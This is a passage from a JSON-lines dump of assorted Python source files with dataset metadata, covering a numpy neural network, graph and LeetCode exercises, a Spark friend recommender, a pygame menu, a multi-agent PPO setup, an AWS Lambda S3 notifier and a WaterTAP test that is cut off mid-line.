= np.dot(self.input.T, z2_delta)\n # delta_w2 = np.dot(self.outputs[1].T, o_delta)\n #\n # self.weights[0] += delta_w1\n # self.weights[1] += delta_w2\n\n # with iteration\n output_errors = None\n for i in reversed(range(len(self.outputs) - 1)):\n if i == 0:\n input = self.input\n else:\n input = self.outputs[i]\n\n if output_errors is None:\n output = self.outputs[-1]\n output_errors = sigmoid_derivative(output) * (self.y - output)\n delta_w = self.step_size * np.dot(input.T, output_errors)\n self.weights[i] += delta_w\n else:\n error = np.dot(output_errors, self.weights[i + 1].T)\n delta = sigmoid_derivative(self.outputs[i + 1]) * error # (T4.4)\n delta_w = self.step_size * np.dot(input.T, delta)\n self.weights[i] += delta_w\n output_errors = delta\n\n def backprop(self):\n\n delta_weights = []\n # delta_k = o_k(1 - o_k)(t_k - o_k)\n # error_terms = None\n # for i in reversed(range(len(self.outputs))):\n # if i == 0:\n # break\n # op = self.outputs[i]\n # ws = self.weights[i - 1]\n # if error_terms is None:\n # error_terms = sigmoid_derivative(op) * (self.y - op)\n # all_deltas = (self.step_size * self.input * error_terms)\n # delta_weights = np.array([[x] for x in np.sum(all_deltas, axis=1)])\n # else:\n # error_terms = sigmoid_derivative(op) * np.dot(ws.T, error_terms)\n # delta_weights = self.step_size * self.input * error_terms\n # self.weights[i - 1] += delta_weights\n\n delta_weights = []\n # delta_k = o_k(1 - o_k)(t_k - o_k)\n propagated_errors = sigmoid_derivative(self.output) * (self.y - self.output)\n for i in reversed(range(len(self.outputs))):\n if i == 0:\n break\n prev_layer_outputs = self.outputs[i - 1]\n d_weights = self.step_size * np.dot(prev_layer_outputs.T, propagated_errors)\n # error_terms = self.step_size * sigmoid_derivative(prev_layer_outputs)*np.dot(self.weights[i-1].T, propagated_errors)\n # d_weights = error_terms * self.input.T\n delta_weights.insert(0, d_weights)\n propagated_errors = np.dot(propagated_errors, self.weights[i - 1].T) * sigmoid_derivative(prev_layer_outputs)\n\n for i, dw in enumerate(delta_weights):\n self.weights[i] += dw\n\n ########################################################################\n # dummy case when node 2 and 1 hidden layer.\n # self.layer1, self.layer2 = self.outputs[1], self.outputs[2]\n # self.weights1, self.weights2 = self.weights\n #\n # error_terms_on_output_layer = 2 * (self.y - self.output) * sigmoid_derivative(self.output)\n # d_weights2 = np.dot(self.layer1.T, error_terms_on_output_layer) # np.dot(output from L1.T, error_terms_by_L1)\n # d_weights1 = np.dot(self.input.T,\n # np.dot(error_terms_on_output_layer, self.weights2.T) * sigmoid_derivative(self.layer1))\n # # np.dot(\n #\n # self.weights[0] += d_weights1\n # self.weights[1] += d_weights2\n\n def train(self, X, y):\n self.output = self.feedforward()\n self.backward()\n #self.backprop()\n\n\nif __name__ == \"__main__\":\n # Each row is a training example, each column is a feature [X1, X2, X3]\n X = np.array(([0, 0, 1], [0, 1, 1], [1, 0, 1], [1, 1, 1]), dtype=float)\n y = np.array(([0], [1], [1], [0]), dtype=float)\n\n LOCAL = True\n NN = NeuralNetwork(X, y, num_hidden_layer=1, num_nodes=4, step_size=1)\n # for i in range(3000): # trains the NN 1,000 times\n # if i % 100 == 0:\n # # print(\"for iteration # \" + str(i) + \"\\n\")\n # # print(\"Input : \\n\" + str(X))\n # predictions = NN.predict()\n # print(\"Actual Output: \\n\" + str(y))\n # print(\"Predicted Output: \\n\" + str(predictions))\n #\n # print(\"Loss: \\n\" + str(np.mean(np.square(y - predictions)))) # mean sum squared loss\n # print(\"My Loss: \\n\" + str(NN.loss()))\n # # print(\"\\n\")\n #\n # NN.train()\n\n NN = NeuralNetwork2(X, y, num_hidden_layer=1, num_nodes=4, step_size=1)\n for i in range(3000): # trains the NN 1,000 times\n if i % 100 == 0:\n print(\"for iteration # \" + str(i) + \"\\n\")\n print(\"Input : \\n\" + str(X))\n print(\"Actual Output: \\n\" + str(y))\n print(\"Predicted Output: \\n\" + str(NN.feedforward()))\n print(\"Loss: \\n\" + str(np.mean(np.square(y - NN.feedforward())))) # mean sum squared loss\n print(\"My Loss: \\n\" + str(NN.loss()))\n print(\"\\n\")\n\n NN.train(X, y)\n LOCAL = False\n\n #####\n from collections import OrderedDict\n import numpy as np\n import os\n\n from Assignment6.Code import kDataPath\n from utils.Assignment5Support import LoadRawData, TrainTestSplit, Featurize\n (xRaw, yRaw) = LoadRawData(kDataPath, includeLeftEye=True, includeRightEye=True)\n (xTrainRaw, yTrainRaw, xTestRaw, yTestRaw) = TrainTestSplit(xRaw, yRaw, percentTest=.25)\n\n (xTrains, xTests) = Featurize(xTrainRaw, xTestRaw,\n includeGradients=False,\n includeRawPixels=False,\n includeIntensities=True)\n xTrains = np.array([[1] + x for x in xTrains])\n xTests = np.array([[1] + x for x in xTests])\n yTrains = np.array([[y] for y in yTrainRaw])\n yTests = np.array([[y] for y in yTestRaw])\n\n\n\n NN = NeuralNetwork2(xTrains, yTrains, num_hidden_layer=2, num_nodes=4, step_size=0.05)\n for i in range(200): # trains the NN 1,000 times\n if i % 10 == 0:\n print(\"for iteration # \" + str(i) + \"\\n\")\n #print(\"Actual Output: \\n\" + str(y))\n #print(\"Predicted Output: \\n\" + str(NN.feedforward())) # mean sum squared loss\n #print(\"My Loss: \\n\" + str(NN.loss()))\n predictions = NN.feedforward()\n print(\"Loss: \" + str(np.mean(np.square(yTrains - predictions))))\n #print(\"\\n\")\n\n NN.train(X, y)","sub_path":"Assignment8/Code/model/NeuralNetworkModel.py","file_name":"NeuralNetworkModel.py","file_ext":"py","file_size_in_byte":15338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"323355691","text":"############################################################\n\nfrom itertools import chain\n\nfrom tools.iter_tools import reduce\n\nfrom projects.graph.graph import Graph\n\n############################################################\n\nDEFAULT__DEBUG = False\nDEFAULT__DEFAULT = -1 # ...because that's what the spec wants\n\n\ndef dict_item__max(a, b):\n\n key_a, value_a = a\n key_b, value_b = b\n\n if value_a is None:\n return b\n\n if value_b is None:\n return a\n\n if value_a >= value_b:\n return a\n\n else:\n return b\n\n\ndef earliest_ancestor(\n ancestor_edges,\n from_node,\n default=DEFAULT__DEFAULT,\n debug=DEFAULT__DEBUG,\n):\n\n # Define `ancestors` graph from `ancestor_edges`...\n ancestors = Graph()\n\n # Define nodes:\n ancestor_nodes = set(chain.from_iterable(ancestor_edges))\n for node in ancestor_nodes:\n ancestors.add_node(node)\n\n # Define edges:\n for parent, child in ancestor_edges:\n # child -> parent\n ancestors.add_edge(child, parent)\n\n if debug:\n print(\"--- ancestors ---\")\n print(ancestors.get_map())\n\n #===========================================================\n # OBVIOUS APPROACH\n #-----------------------------------------------------------\n # - Search from `from_node` to every other node\n # - Pick the longest path\n #-----------------------------------------------------------\n\n other_nodes = ancestors.get_nodes().difference({from_node})\n\n if debug:\n print(\"--- other nodes ---\")\n print(other_nodes)\n\n ancestor_paths = {\n to_node: ancestors.bfs(from_node, to_node, on_visit=None)\n for to_node in other_nodes\n }\n\n if debug:\n print(\"--- ancestor paths ---\")\n print(ancestor_paths)\n\n ancestor_distances = {\n to_node: len(path) if path else None\n for to_node, path in ancestor_paths.items()\n }\n\n if debug:\n print(\"--- ancestor distances ---\")\n print(ancestor_distances)\n\n longest_path = reduce(dict_item__max, ancestor_distances.items())\n\n if debug:\n print(\"--- longest path ---\")\n print(longest_path)\n\n if longest_path[1] is None:\n earliest_node = default\n else:\n earliest_node = longest_path[0]\n\n return earliest_node\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"234369333","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/env python\r\n\r\nimport redis\r\nfrom config import REDIS_HOST, REDIS_PORT\r\n\r\nUSER_PREFIX = \"user:\"\r\nSESSION_PREFIX = \"session:\"\r\nBOOK_PREFIX = \"book:\"\r\nORDER_PREFIX = \"order:\"\r\n\r\n#redis连接\r\npool = redis.ConnectionPool(host=REDIS_HOST, port=REDIS_PORT, db=0)\r\nr = redis.Redis(connection_pool=pool)\r\n\r\n","sub_path":"design-13331010-better/bookstore/utils/redis_conn.py","file_name":"redis_conn.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"356964068","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n将 amazon_stock_price 信息发送给我. 这里没有设置 SNS, 只是对 S3 写入一个文件进行模拟通知.\n\"\"\"\n\nimport boto3\nfrom datetime import datetime\n\n\ndef lambda_handler(event, context):\n price = event[\"amazon_stock_price\"]\n bucket_name = \"eqtest-sanhe\"\n utcnow = datetime.utcnow()\n key = \"{}.txt\".format(utcnow.strftime(\"%Y-%m-%d-%H-%M-%S\"))\n body = \"amazon price on %s is %s\" % (utcnow, price)\n\n s3 = boto3.client(\"s3\")\n s3.put_object(Bucket=bucket_name, Key=key, Body=body.encode(\"utf-8\"))\n return {\"message\": body}\n","sub_path":"docs/source/01-AWS/01-Compute/07-Step-Function-Root/example1-basic-choice/func_notify_me.py","file_name":"func_notify_me.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151767059","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 16 22:23:11 2016\n\n@author: xzk\n\"\"\"\n\nclass Solution(object):\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n ileft, iright = 0, len(nums)-1\n while True:\n center = (ileft + iright) / 2\n if nums[ileft] > target or nums[iright] < target:\n return [-1, -1]\n if nums[center] == target:\n break\n elif nums[center] > target:\n iright = center\n else:\n ileft = center\n if iright == ileft + 1:\n if nums[ileft] == target:\n center = ileft\n else:\n center = iright\n break\n \n if nums[center] != target:\n return [-1, -1]\n ans = [ileft, iright]\n for i in xrange(center, iright+1):\n if nums[i] != target:\n ans[1] = i - 1\n break\n for i in xrange(ileft, center+1):\n if nums[i] == target:\n ans[0] = i\n break\n return ans\n \n def searchRange2(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n if nums == []:\n return [-1,-1]\n ileft, iright = 0, len(nums)-1\n if nums[ileft] > target or nums[iright] < target:\n return [-1, -1]\n target -= 0.5\n idx1, idx2 = -1, -1\n while True:\n center = (ileft + iright) / 2\n if nums[ileft] > target:\n idx1 = ileft \n break\n if nums[center] >= target:\n iright = center\n elif nums[center] <= target:\n ileft = center\n if iright == ileft + 1:\n if nums[iright] >= target and nums[ileft] <= target:\n idx1 = iright\n break\n target += 1\n ileft, iright = 0, len(nums)-1\n while True:\n center = (ileft + iright) / 2\n if nums[iright] < target:\n idx2 = iright\n break\n if nums[center] >= target:\n iright = center\n elif nums[center] <= target:\n ileft = center\n if iright == ileft + 1:\n if nums[iright] >= target and nums[ileft] <= target:\n idx2 = ileft\n break\n if idx1 > idx2:\n return [-1, -1]\n return [idx1, idx2]","sub_path":"34Search for a Range.py","file_name":"34Search for a Range.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"145221611","text":"__author__ = 'Freek, Zafer, Angelo'\n__build__ = \"versie 3.0\"\n\nfrom iNStagram.api_requests.app_requests import haal_stationgegevens_op\nimport os\n\nbestandnaam_stations=\"../file_io/stations.txt\" # het is relatief aan de file .../file_io/. <- je bent hier\n\ndef sla_stationsgegevens_op(alleen_als_niet_bestaat=False):\n \"\"\"\n Slaat de stationsgegevens op in een bestand\n :param alleen_als_niet_bestaat: zorgt ervoor dat er allen wordt opgeslagen als het bestand niet bestat\n :type alleen_als_niet_bestaat: bool\n :param bestandnaam: bestandsnaam waarin de stations worden opgeslagen\n :return:\n \"\"\"\n if alleen_als_niet_bestaat and os.path.exists(bestandnaam_stations):\n print(\"bestond al\")\n return\n stationsgegevens = haal_stationgegevens_op()\n print(\"Stations opslaan...\")\n with open(bestandnaam_stations,\"w\") as stations_bestand:\n for station in stationsgegevens:\n stations_bestand.write(str(station)+\"\\n\")\n #with open sluit de bestand.close() als de blok eindigd\n\ndef lees_stationgegevens():\n \"\"\"\n Leest de stationsgegevens uit het (lokaal) opgeslagen bestand, dit scheelt want je hoeft dan niet steeds verbinding met de ns api te maken\n :return: lijst van dicts met namen en locatie per station\n :rtype: list\n \"\"\"\n from ast import literal_eval\n stations = []\n print(\"Stations lezen...\")\n with open(bestandnaam_stations,\"r\") as stations_bestand:\n for regel in stations_bestand.readlines():\n station_dict = literal_eval(regel)\n stations.append(station_dict)\n\n\n return stations\n\nif __name__ == '__main__':\n sla_stationsgegevens_op(True)\n lees_stationgegevens()","sub_path":"iNStagram/file_io/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"115905606","text":"#\n# @lc app=leetcode id=31 lang=python3\n#\n# [31] Next Permutation\n#\n\n# @lc code=start\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n i = j = len(nums)-1\n while i>0 and nums[i-1]>=nums[i]:\n i-=1\n if i ==0 :\n nums.reverse()\n return\n k = i-1\n while j>k and nums[j]<=nums[k]:\n j-=1\n nums[k],nums[j] = nums[j],nums[k]\n l,r = k+1,len(nums)-1\n while l OrderedDict([('a', 1), ('z', 34), ('b', 2),('c', 3)])\nd['r'] = '67' # add to the OrderedDict like an ordinary dict()\ng = d.keys() # the keys() method works on it\nprint(d['a']) # --> 1 can be accessed with keywords\nprint(g) # --> odict_keys(['a', 'z', 'b', 'c', 'r'])\nprint(d.values()) # --> odict_values([1, 34, 2, 3, '67']) values() method work also\ne = dict(d)\nprint(e) # --> {'a': 1, 'z': 34, 'b': 2, 'c': 3, 'r': '67'} can be converted to a dictionary\n\n# alternative ways of creating dictionaries\nw = dict(a=9,b=6,v=7)\nr = dict([('a', 6), ('t', 9), ('y', 67)])\n\n# merging two dicts\nprint(w) # --> {'a': 9, 'b': 6, 'v': 7}\nprint(r) # --> {'a': 6, 't': 9, 'y': 67}\nc = {**w, **r} # syntactic sugar for merging two dictionaries and creating new dictionary\n# when two keys are in both dicts the second key is used\n\nr.update(w) # when two keys are in both dicts the key in the dictionary calling the method is used\nprint(c) # --> {'a': 6, 'b': 6, 'v': 7, 't': 9, 'y': 67}\nprint(r) # ---> {'a': 9, 't': 9, 'y': 67, 'b': 6, 'v': 7}\nn = w.setdefault('yu',68) # adds new item to dict, returns value if key already in dict.\nb = w.get('o', 9) # does not add to dict() if key not in dict()\nw['yu'] = w.get('yu')-8\n\n# Counter Dictionaries\n# this creates a dictionary that returns a dictionary sorted in descending order of frequency showing\n# the number of times an item occurs in an iterable\nb='rfoireoosjjfototieldkfkorpwprkgptktprkptktjtootktptktpktktotktotkotktototptktootptoro'\nbc = Counter(b)\nprint(bc) # --> Counter({'t': 24, 'o': 17, 'k': 14, 'p': 9, 'r': 6, 'f': 3, 'j': 3, 'i': 2,\n\t\t\t\t# 'e': 2, 's': 1, 'l': 1, 'd': 1, 'w': 1, 'g': 1})\n\n# Counter objects support dictionary methods.\n# Counters can be used to check if two words are Anagrams\na = 'anagram'\nc = 'gramana'\nprint(Counter(a)==Counter(c))\n\n","sub_path":"Collections.py","file_name":"Collections.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"508280570","text":"import numpy as np\nfrom baselines import logger\nfrom baselines.common import set_global_seeds\nfrom baselines.common.mpi_adam import MpiAdam\n\nimport multiagent.scenarios as scenarios\nfrom multiagent.model_ADMM import Model\nfrom multiagent.runner import Runner\nfrom multiagent.policy_ADMM import build_policy\n\nimport gym\nfrom baselines.bench import Monitor\nfrom baselines.bench.monitor import load_results\nfrom baselines.common import retro_wrappers, set_global_seeds\nfrom baselines.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom baselines.common.vec_env.subproc_vec_env import SubprocVecEnv\n\ntry:\n from mpi4py import MPI\nexcept ImportError:\n MPI = None\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nclass ClipActionsWrapper(gym.Wrapper):\n def step(self, action):\n # try:\n # low, high = self.env.unwrapped._feasible_action()\n # except:\n # low, high = self.action_space.low, self.action_space.high\n\n # import numpy as np\n # action = np.nan_to_num(action)\n # action = np.clip(action, low, high)\n return self.env.step(action)\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\nclass MAPPO(object):\n \"\"\" Paralell CPO algorithm \"\"\"\n def __init__(self, env_id, nsteps, gamma=0.995, lam=0.95, ent_coef=0.0, admm_iter=10, cliprange=0.2, \n lr=3e-4, vf_iters=3, beta=1.0, alpha=1.0, rho=100.0, eta=1.0, num_env=1, reward_scale=1.0, \n seed=None, load_path=None, logger_dir=None, force_dummy=False, info_keywords=(), **network_kwargs):\n # Setup stuff\n set_global_seeds(seed)\n np.set_printoptions(precision=5)\n\n # parameters\n self.lr = lr\n self.cliprange = cliprange\n\n scenario = scenarios.load('{}.py'.format(env_id)).Scenario()\n world = scenario.make_world()\n\n if hasattr(world.agents[0], 'adversary'):\n good_agents = [agent for agent in world.agents if not agent.adversary]\n world.n_agt = len(good_agents)\n world.n_adv = len(world.agents) - world.n_agt\n world.n = world.n_agt+world.n_adv\n else:\n world.n_agt = 0\n world.n_adv = len(world.agents)\n world.n = world.n_agt+world.n_adv\n self.n_agt, self.n_adv, self.n = world.n_agt, world.n_adv, world.n\n\n # Environment\n if num_env == 1:\n env = self.make_env(env_id, seed, logger_dir=logger_dir, reward_scale=1.0, mpi_rank=0, subrank=0, info_keywords=info_keywords)\n else:\n env = self.make_vec_env(env_id, seed, logger_dir=logger_dir, num_env=num_env, reward_scale=reward_scale,\n force_dummy=force_dummy, info_keywords=info_keywords)\n self.env = env\n\n # create interactive policies for each agent\n self.policies = policies= [build_policy(env, world, i, network_kwargs['n_hiddens']) for i in range(len(world.agents))]\n # model\n self.model = model = Model(env=env, world=world, policies=policies, nsteps=nsteps, load_path=None, admm_iter=admm_iter, \n ent_coef=ent_coef, vf_iters=vf_iters, alpha=alpha, rho=rho, beta=beta, eta=eta)\n # runner\n self.runner = Runner(env=env, model=model, nsteps=nsteps, gamma=gamma, lam=lam)\n\n def make_env(self, env_id, seed, logger_dir=None, reward_scale=1.0, mpi_rank=0, subrank=0, info_keywords=()):\n \"\"\"\n Create a wrapped, monitored gym.Env for safety.\n \"\"\"\n scenario = scenarios.load('{}.py'.format(env_id)).Scenario()\n world = scenario.make_world()\n env_dict = {\n \"world\": world,\n 'reset_callback': scenario.reset_world,\n 'reward_callback': scenario.reward, \n 'observation_callback': scenario.observation,\n 'info_callback': None,\n 'done_callback': scenario.done, \n 'shared_viewer': True\n }\n env = gym.make('MultiAgent-v0', **env_dict)\n env.seed(seed + subrank if seed is not None else None)\n env = Monitor(env,\n logger_dir and os.path.join(logger_dir, str(mpi_rank) + '.' + str(subrank)),\n allow_early_resets=True,\n info_keywords=info_keywords)\n env = ClipActionsWrapper(env)\n if reward_scale != 1.0:\n from baselines.common.retro_wrappers import RewardScaler\n env = RewardScaler(env, reward_scale)\n return env\n\n def make_vec_env(self, env_id, seed, logger_dir=None, reward_scale=1.0, num_env=1, force_dummy=False, info_keywords=()):\n \"\"\"\n Create a wrapped, monitored SubprocVecEnv for Atari and MuJoCo.\n \"\"\"\n mpi_rank = MPI.COMM_WORLD.Get_rank() if MPI else 0\n seed = seed + 10000 * mpi_rank if seed is not None else None\n def make_thunk(rank, initializer=None):\n return lambda: self.make_env(\n env_id,\n seed,\n logger_dir=logger_dir,\n reward_scale=reward_scale,\n mpi_rank=mpi_rank,\n subrank=rank,\n info_keywords=info_keywords,\n )\n set_global_seeds(seed)\n\n if not force_dummy and num_env > 1:\n return SubprocVecEnv([make_thunk(i) for i in range(num_env)])\n else:\n return DummyVecEnv([make_thunk(i) for i in range(num_env)])\n","sub_path":"multiagent/backup/mappo_ADMM.py","file_name":"mappo_ADMM.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379424698","text":"import sys\nimport pygame\nfrom pygame.locals import *\n\n\nclass PopupMenu:\n def __init__(self):\n self.font_family = 'hgゴシックehgpゴシックehgsゴシックe'\n self.font_size = 20\n self.item_margin_y = 10\n self.menu_pad = 10\n self.menu_bg_color = (255, 255, 255)\n self.font_color = (50, 50, 50)\n\n def max_width(self, context_items):\n mlen = 0\n for itm in context_items:\n mlen = max(mlen, len(itm))\n return mlen\n\n def show(self, surface, ev, context_items):\n itemslen = len(context_items)\n\n width = self.max_width(context_items)*self.font_size + (self.menu_pad*2)\n height = itemslen*(self.font_size+self.item_margin_y) + (self.menu_pad*2)\n menu_surf = pygame.Surface((width, height))\n menu_rect = menu_surf.get_rect()\n menu_rect.left = ev.pos[0]\n menu_rect.top = ev.pos[1]\n\n # create menu item surface list\n sysfont = pygame.font.SysFont(self.font_family, self.font_size)\n menu_item_surfs = []\n for stritem in context_items:\n font_surf = sysfont.render(stritem, True, self.font_color)\n menu_item_surfs.append(font_surf)\n\n def contains(e):\n for i, item in enumerate(menu_item_surfs):\n item_rect = item.get_rect()\n left = ev.pos[0] + self.menu_pad\n top = ev.pos[1] + self.menu_pad + i*(self.font_size + self.item_margin_y)\n right = left + item_rect.right\n bottom = top + item_rect.bottom\n mx = e.pos[0]\n my = e.pos[1]\n if (mx >= left and mx <= right) and (my >= top and my <= bottom):\n return i, item\n return None, None\n\n while True:\n pygame.time.wait(30)\n menu_surf.fill(self.menu_bg_color)\n\n for i, item in enumerate(menu_item_surfs):\n item_rect = item.get_rect()\n item_rect.left = self.menu_pad\n item_rect.top = self.menu_pad + i*(self.font_size + self.item_margin_y)\n menu_surf.blit(item, item_rect)\n\n surface.blit(menu_surf, menu_rect)\n pygame.display.update()\n\n for e in pygame.event.get():\n if e.type == QUIT:\n pygame.quit()\n sys.exit(0)\n elif e.type == KEYDOWN:\n if e.key == K_ESCAPE:\n return None\n elif e.type == MOUSEBUTTONDOWN and e.button == 1:\n i, item = contains(e)\n if i is not None:\n return context_items[i]\n return None\n","sub_path":"core/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521850324","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyspark\n\nfrom pyspark.sql import *\nfrom pyspark.sql.functions import *\nfrom pyspark import SparkContext, SparkConf\n\nfrom operator import itemgetter\n\ndef extract_second_friend(tuple):\n firsts = tuple[1].split(\",\")\n\n # ignore user with no friend\n if firsts[0] == \"\":\n return []\n \n firsts.sort(key=lambda item: int(item))\n seconds = []\n for user in firsts:\n for second in firsts:\n if user != second:\n seconds.append([\"%s,%s\" % (user, second), 1])\n return seconds\n\ndef transform_pairkey_to_user_friend(tuple):\n pairkey = tuple[0].split(\",\")\n return (pairkey[0], [int(pairkey[1]), tuple[1]])\n\ndef sort_seconds_by_rank(v):\n ordered = list(v)\n ordered.sort(key=itemgetter(0))\n ordered.sort(reverse=True,key=itemgetter(1))\n return \",\".join(map(lambda x: str(x[0]), ordered[:10]))\n\nfilename = \"../hw1-bundle/q1/data/soc-LiveJournal1Adj.txt\"\n\n# create the session\n#conf = SparkConf().setMaster('spark://jaehong-VM0:7077').setAppName('test')\nconf = SparkConf().setMaster('local').setAppName('test')\n\n# create the context\nsc = pyspark.SparkContext(conf=conf)\nspark = SparkSession.builder.getOrCreate()\n\ndist_data = sc.parallelize(sc.textFile(filename).map(lambda x: x.split(\"\\t\")).collect())\nlonely_users = dist_data.filter(lambda x: x[1] == \"\")\n#user_list = dist_data.map(lambda x: x[0])\n\nsecond_hop_friend = dist_data.flatMap(extract_second_friend)\nmutual_rank = second_hop_friend.reduceByKey(lambda a, b: a+b).map(transform_pairkey_to_user_friend)\nrecommand_list = mutual_rank.groupByKey().mapValues(sort_seconds_by_rank)\n\nresult_data = recommand_list.union(lonely_users).sortBy(lambda x: int(x[0])).map(lambda x: \"\\t\".join(str(d) for d in x))\noutput_file = open(\"q1_output.txt\", 'w')\noutput_file.write(\"\\n\".join(result_data.collect()))\noutput_file.write(\"\\n\")\noutput_file.close()\n","sub_path":"hw1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190382901","text":"###############################################################################\n# WaterTAP Copyright (c) 2021, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National\n# Laboratory, National Renewable Energy Laboratory, and National Energy\n# Technology Laboratory (subject to receipt of any required approvals from\n# the U.S. Dept. of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n###############################################################################\nimport sys\nimport pytest\nfrom io import StringIO\n\nfrom pyomo.environ import (\n ConcreteModel,\n TransformationFactory,\n assert_optimal_termination,\n)\nfrom pyomo.network import Arc\nfrom pyomo.util.check_units import assert_units_consistent\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.core.util import get_solver\nfrom idaes.core.util.model_statistics import degrees_of_freedom\nimport idaes.core.util.scaling as iscale\nimport idaes.logger as idaeslog\nfrom idaes.core.util.initialization import propagate_state\n\n# Import components\nfrom watertap.unit_models.mvc.components import Evaporator\nfrom watertap.unit_models.mvc.components import Compressor\n\n# Import property packages\nimport watertap.property_models.seawater_prop_pack as props_sw\nimport watertap.property_models.water_prop_pack as props_w\n\n\ndef build(m):\n # Properties\n m.fs.properties_feed = props_sw.SeawaterParameterBlock()\n m.fs.properties_vapor = props_w.WaterParameterBlock()\n\n # Evaporator\n m.fs.evaporator = Evaporator(\n default={\n \"property_package_feed\": m.fs.properties_feed,\n \"property_package_vapor\": m.fs.properties_vapor,\n }\n )\n # Compressor\n m.fs.compressor = Compressor(default={\"property_package\": m.fs.properties_vapor})\n\n # Connections\n m.fs.s01 = Arc(\n source=m.fs.evaporator.outlet_vapor, destination=m.fs.compressor.inlet\n )\n m.fs.s02 = Arc(\n source=m.fs.compressor.outlet, destination=m.fs.evaporator.inlet_condenser\n )\n TransformationFactory(\"network.expand_arcs\").apply_to(m)\n\n\ndef scale(m):\n m.fs.properties_feed.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Liq\", \"H2O\")\n )\n m.fs.properties_feed.set_default_scaling(\n \"flow_mass_phase_comp\", 1e2, index=(\"Liq\", \"TDS\")\n )\n m.fs.properties_vapor.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Vap\", \"H2O\")\n )\n m.fs.properties_vapor.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Liq\", \"H2O\")\n )\n # Evaporator\n iscale.set_scaling_factor(m.fs.evaporator.area, 1e-3)\n iscale.set_scaling_factor(m.fs.evaporator.U, 1e-3)\n iscale.set_scaling_factor(m.fs.evaporator.delta_temperature_in, 1e-1)\n iscale.set_scaling_factor(m.fs.evaporator.delta_temperature_out, 1e-1)\n iscale.set_scaling_factor(m.fs.evaporator.lmtd, 1e-1)\n # iscale.set_scaling_factor(m.fs.evaporator.heat_transfer, 1e-6)\n # Compressor\n iscale.set_scaling_factor(m.fs.compressor.control_volume.work, 1e-6)\n\n iscale.calculate_scaling_factors(m)\n\n\ndef specify(m):\n # state variables\n # Feed inlet\n m.fs.evaporator.inlet_feed.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].fix(1)\n m.fs.evaporator.inlet_feed.flow_mass_phase_comp[0, \"Liq\", \"TDS\"].fix(0.05)\n m.fs.evaporator.inlet_feed.temperature[0].fix(273.15 + 50.52) # K\n m.fs.evaporator.inlet_feed.pressure[0].fix(1e5) # Pa\n\n m.fs.evaporator.outlet_vapor.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].fix(0.5)\n m.fs.evaporator.U.fix(1e3) # W/K-m^2\n m.fs.evaporator.area.fix(100) # m^2\n\n m.fs.compressor.pressure_ratio.fix(2)\n m.fs.compressor.efficiency.fix(0.8)\n\n\ndef initialize(m):\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].fix(0.5)\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].fix(1e-8)\n m.fs.evaporator.inlet_condenser.temperature[0].fix(400) # K\n m.fs.evaporator.inlet_condenser.pressure[0].fix(0.5e5) # Pa\n\n m.fs.evaporator.initialize(outlvl=idaeslog.INFO_HIGH)\n\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].unfix()\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].unfix()\n m.fs.evaporator.inlet_condenser.temperature[0].unfix() # K\n m.fs.evaporator.inlet_condenser.pressure[0].unfix() # Pa\n\n propagate_state(m.fs.s01)\n m.fs.compressor.initialize(outlvl=idaeslog.INFO_HIGH)\n\n\n@pytest.mark.requires_idaes_solver\n@pytest.mark.component\ndef test_mvc():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n\n build(m)\n assert_units_consistent(m)\n scale(m)\n specify(m)\n assert degrees_of_freedom(m) == 0\n\n initialize(m)\n\n solver = get_solver()\n results = 